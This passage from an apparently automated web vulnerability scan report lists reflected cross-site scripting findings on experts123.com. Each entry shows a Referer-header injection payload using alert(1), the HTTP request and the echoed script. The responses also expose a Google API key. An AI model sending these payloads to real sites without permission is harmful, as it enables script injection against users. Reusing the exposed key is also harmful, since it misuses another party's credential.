experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=fdc6b';alert(1)//1fcabebdc24');
});


</script>
...[SNIP]...

1.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=ccc8e';alert(1)//6bb3a5f1c5f');
});


</script>
...[SNIP]...

1.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "1947f";alert(1)//760c35e1ead";
var RSQ = true;

$(function() {
experts123.Question.initialize(880822, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=a50b1';alert(1)//6a7613daa75');
});


</script>
...[SNIP]...

1.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d5395";alert(1)//8cf555a3bfa";
var RSQ = true;

$(function() {
experts123.Question.initialize(893817, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=1a44e';alert(1)//5f700a46bff');
});


</script>
...[SNIP]...

1.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "dacf1";alert(1)//155dee88ae4";
var RSQ = true;

$(function() {
experts123.Question.initialize(541537, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=c2ffb';alert(1)//2017b493094');
});


</script>
...[SNIP]...

1.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d6163";alert(1)//498765472fb";
var RSQ = true;

$(function() {
experts123.Question.initialize(202208, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d0800";alert(1)//0d9e6834871";
var RSQ = true;

$(function() {
experts123.Question.initialize(626726, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=aaeae';alert(1)//9e376e61a79');
});


</script>
...[SNIP]...

1.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=71c11';alert(1)//0c64a2d8a24');
});


</script>
...[SNIP]...

1.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "11ee8";alert(1)//0fd04f86b98";
var RSQ = true;

$(function() {
experts123.Question.initialize(197790, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "aeb3b";alert(1)//3f4b39407ec";
var RSQ = true;

$(function() {
experts123.Question.initialize(1075195, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
